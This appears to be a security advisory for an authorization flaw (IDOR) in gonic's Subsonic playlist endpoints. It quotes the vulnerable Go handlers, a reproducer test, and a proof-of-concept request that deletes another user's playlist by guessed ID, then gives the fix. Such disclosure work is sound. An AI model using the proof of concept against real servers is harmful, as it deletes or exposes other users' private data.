In gonic, the Subsonic API endpoints /rest/deletePlaylist.view and /rest/getPlaylist.view perform no per-resource authorization. Once authenticated as any user (admin or not), an attacker can:
id.id.The Subsonic playlist id is base64url("<userID>/<filename>.m3u"). Because filenames are user-supplied or time-derived and the userID is a small integer, IDs are guessable and frequently exposed (e.g. a previously-public playlist that was later made private still has the same ID).
This breaks the multi-user trust boundary of gonic: a low-privileged user can wipe an administrator's curated playlists, and a user can exfiltrate any private playlist they obtain an ID for.
This was originally disclosed to the maintainer by email and has been fixed in commit 6dd71e6a3c966867ef8c900d359a7df75789f410 (fix(subsonic): enforce playlist ownership on getPlaylist/deletePlaylist, 2026-05-18). The fix has not yet been included in a tagged release; the latest tagged version v0.20.1 is still vulnerable. Filing this advisory now that private vulnerability reporting is enabled on the repo, so the issue has a public record once the next release ships.
v0.20.1 / commit 37090aa7)Delete IDOR — server/ctrlsubsonic/handlers_playlist.go lines 177-187:
func (c *Controller) ServeDeletePlaylist(r *http.Request) *spec.Response {
params := r.Context().Value(CtxParams).(params.Params)
playlistID, err := params.GetFirstID("id", "playlistId")
if err != nil {
return spec.NewError(10, "please provide an `id` or `playlistId` parameter")
}
if err := c.playlistStore.Delete(playlistIDDecode(playlistID)); err != nil {
return spec.NewError(0, "delete playlist: %v", err)
}
return spec.NewResponse()
}
The handler never loads the playlist to check playlist.UserID == user.ID. Compare to ServeUpdatePlaylist (same file, line 138) which does perform this check.
Read IDOR — server/ctrlsubsonic/handlers_playlist.go lines 51-68:
func (c *Controller) ServeGetPlaylist(r *http.Request) *spec.Response {
params := r.Context().Value(CtxParams).(params.Params)
playlistID, err := params.GetFirstID("id", "playlistId")
if err != nil {
return spec.NewError(10, "please provide an `id` parameter")
}
playlist, err := c.playlistStore.Read(playlistIDDecode(playlistID))
if err != nil {
return spec.NewError(70, "playlist with id %s not found", playlistID)
}
// ... never checks playlist.UserID or playlist.IsPublic ...
sub.Playlist = rendered
return sub
}
The listing endpoint ServeGetPlaylists (line 38) correctly filters by playlist.UserID != user.ID && !playlist.IsPublic, but the singular getPlaylist did not.
A reproducer against the existing test fixture (server/ctrlsubsonic):
func TestIDOR_DeleteOtherUsersPlaylist(t *testing.T) {
f := newFixture(t)
victimRelPath := filepath.Join("1", "victim-private.m3u")
_ = f.contr.playlistStore.Write(victimRelPath, &playlistp.Playlist{
UserID: f.admin.ID, Name: "victim-private", IsPublic: false,
Items: []string{"/music/foo.flac"},
})
victimID := playlistIDEncode(victimRelPath).String()
// f.alt is a non-admin, non-owner user
body := f.query(t, f.contr.ServeDeletePlaylist, f.alt, url.Values{"id": {victimID}})
// Subsonic returns status="ok" and the file is gone.
}
Test output:
--- PASS: TestIDOR_ReadOtherUsersPrivatePlaylist (0.07s)
--- PASS: TestIDOR_DeleteOtherUsersPlaylist (0.07s)
PASS
ok go.senan.xyz/gonic/server/ctrlsubsonic 0.730s
GET /rest/deletePlaylist.view?u=lowpriv&p=lowpriv&v=1&c=poc&f=json&id=cGwtMS1zaGFyZWQubTN1
Response: {"subsonic-response":{"status":"ok","version":"..."}} — playlist is gone.
base64("<smallUserID>/<name>.m3u")) and previously-public IDs persist after being marked private.createUser, non-admin role). This bug collapsed the user-to-user authorization model.Latest tagged release v0.20.1 and all prior versions back to when the playlist M3U store was introduced. Master HEAD is fixed at commit 6dd71e6a3c966867ef8c900d359a7df75789f410.
6dd71e6)Load the playlist first and enforce ownership in both handlers:
// ServeGetPlaylist
if playlist.UserID != user.ID && !playlist.IsPublic {
return spec.NewError(50, "you aren't allowed to read that user's playlist")
}
// ServeDeletePlaylist
if playlist.UserID != 0 && playlist.UserID != user.ID {
return spec.NewError(50, "you aren't allowed to delete that user's playlist")
}
This mirrors the existing ownership check already present in ServeCreateOrUpdatePlaylist (line 84) and ServeUpdatePlaylist (line 138).
Reported by Vishal Shukla (@shukla304 / @therawdev).
{
"nvd_published_at": "2026-06-19T19:16:36Z",
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T23:33:24Z",
"cwe_ids": [
"CWE-285",
"CWE-639"
]
}